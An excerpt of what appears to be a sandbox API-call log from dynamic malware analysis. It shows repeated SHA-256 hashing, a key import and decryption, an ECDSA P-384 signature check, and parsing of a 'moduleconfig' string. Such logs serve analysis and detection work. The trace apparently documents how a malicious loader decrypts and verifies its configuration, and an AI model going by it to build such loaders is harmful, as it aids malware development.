	[0214.664] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.664] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.664] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0214.664] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.664] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735258
	[0214.664] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2735258, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735258, pdwDataLen=0x128ba4) returned 1
	[0214.664] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.664] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.664] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.665] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.665] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0214.665] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.665] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735280
	[0214.665] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2735280, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735280, pdwDataLen=0x128ba4) returned 1
	[0214.665] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.665] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.665] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.665] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.665] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0214.666] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.666] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27352a8
	[0214.666] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27352a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27352a8, pdwDataLen=0x128ba4) returned 1
	[0214.666] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.666] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.666] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.666] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.666] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0214.666] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.666] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27352d0
	[0214.666] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27352d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27352d0, pdwDataLen=0x128ba4) returned 1
	[0214.666] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.666] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.666] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.667] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.667] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0214.667] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.667] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27352f8
	[0214.667] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27352f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27352f8, pdwDataLen=0x128ba4) returned 1
	[0214.667] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.667] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.667] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.667] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.667] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0214.667] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.667] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735320
	[0214.667] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2735320, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735320, pdwDataLen=0x128ba4) returned 1
	[0214.667] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.667] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.667] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.668] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.668] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0214.668] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.668] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735348
	[0214.668] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2735348, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735348, pdwDataLen=0x128ba4) returned 1
	[0214.668] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.668] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.668] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.668] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.668] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0214.669] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.669] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735370
	[0214.669] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2735370, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735370, pdwDataLen=0x128ba4) returned 1
	[0214.669] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.669] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.669] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.669] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.669] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0214.669] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.669] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735398
	[0214.669] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2735398, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735398, pdwDataLen=0x128ba4) returned 1
	[0214.669] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.669] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.669] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.670] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.670] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0214.670] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.670] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27353c0
	[0214.670] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27353c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27353c0, pdwDataLen=0x128ba4) returned 1
	[0214.670] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.670] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.670] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.670] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.670] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0214.670] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.670] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27353e8
	[0214.670] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27353e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27353e8, pdwDataLen=0x128ba4) returned 1
	[0214.670] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.670] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.670] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.671] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.671] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0214.671] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.671] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735410
	[0214.671] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2735410, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735410, pdwDataLen=0x128ba4) returned 1
	[0214.671] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.671] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.671] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.671] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.672] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0214.672] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.672] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735438
	[0214.672] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2735438, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735438, pdwDataLen=0x128ba4) returned 1
	[0214.672] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.672] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.672] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.672] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.672] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0214.673] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735460
	[0214.673] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2735460, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735460, pdwDataLen=0x128ba4) returned 1
	[0214.673] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.673] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.673] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.673] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.673] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0214.673] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735488
	[0214.673] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2735488, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735488, pdwDataLen=0x128ba4) returned 1
	[0214.673] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.673] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.673] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.674] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.674] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0214.674] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.674] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27354b0
	[0214.674] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27354b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27354b0, pdwDataLen=0x128ba4) returned 1
	[0214.674] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.674] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.674] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.674] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.674] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0214.674] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.674] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27354d8
	[0214.674] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27354d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27354d8, pdwDataLen=0x128ba4) returned 1
	[0214.674] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.674] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.674] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.675] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.675] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0214.675] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.675] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735500
	[0214.675] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2735500, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735500, pdwDataLen=0x128ba4) returned 1
	[0214.675] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.675] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.675] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.676] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.676] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0214.676] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.676] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2735528
	[0214.676] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2735528, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735528, pdwDataLen=0x128ba4) returned 1
	[0214.676] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.676] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.676] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.676] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.676] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0214.676] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.676] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2735550, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735550, pdwDataLen=0x128ba4) returned 1
	[0214.676] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.676] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.676] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.677] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.677] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0214.677] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.677] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2735578, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2735578, pdwDataLen=0x128ba4) returned 1
	[0214.677] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.677] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.677] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.677] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.677] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0214.678] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.678] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27355a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27355a0, pdwDataLen=0x128ba4) returned 1
	[0214.678] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.678] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.678] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.678] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.678] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0214.678] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.678] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27355c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27355c8, pdwDataLen=0x128ba4) returned 1
	[0214.678] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.678] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.679] CryptImportKey (in: hProv=0x225968, pbData=0x128b98, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x128bd8 | out: phKey=0x128bd8*=0x22b6c00) returned 1
	[0214.679] CryptSetKeyParam (hKey=0x22b6c00, dwParam=0x4, pbData=0x128bc4*=0x1, dwFlags=0x0) returned 1
	[0214.679] CryptSetKeyParam (hKey=0x22b6c00, dwParam=0x1, pbData=0x27356e0, dwFlags=0x0) returned 1
	[0214.680] CryptDecrypt (in: hKey=0x22b6c00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2740c28, pdwDataLen=0x128bcc | out: pbData=0x2740c28, pdwDataLen=0x128bcc) returned 1
	[0214.680] CryptDestroyKey (hKey=0x22b6c00) returned 1
	[0214.680] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.680] GetVersion () returned 0x1db10106
	[0214.680] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x128bd8, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x128bd8) returned 0x0
	[0214.681] BCryptImportKeyPair (in: hAlgorithm=0x22ee348, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x128be0, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x128be0) returned 0x0
	[0214.683] BCryptGetProperty (in: hObject=0x229a1d0, pszProperty="SignatureLength", pbOutput=0x128bf8, cbOutput=0x4, pcbResult=0x128bd0, dwFlags=0x0 | out: pbOutput=0x128bf8, pcbResult=0x128bd0) returned 0x0
	[0214.683] BCryptVerifySignature (hKey=0x229a1d0, pPaddingInfo=0x0, pbHash=0x22a5ab8, cbHash=0x30, pbSignature=0x2745630, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0214.685] BCryptDestroyKey (in: hKey=0x229a1d0 | out: hKey=0x229a1d0) returned 0x0
	[0214.685] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee348, dwFlags=0x0 | out: hAlgorithm=0x22ee348) returned 0x0
	[0214.685] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5ab8) returned 1
	[0214.685] lstrlenA (lpString="<moduleconfig>*</moduleconfig>") returned 30
	[0214.685] CharLowerBuffA (in: lpsz="moduleconfig", cchLength=0xc | out: lpsz="moduleconfig") returned 0xc
	[0214.685] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb10) returned 1
	[0214.685] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8
	[0214.685] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb10) returned 1
	[0214.686] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0214.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb10) returned 1
	[0214.686] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8
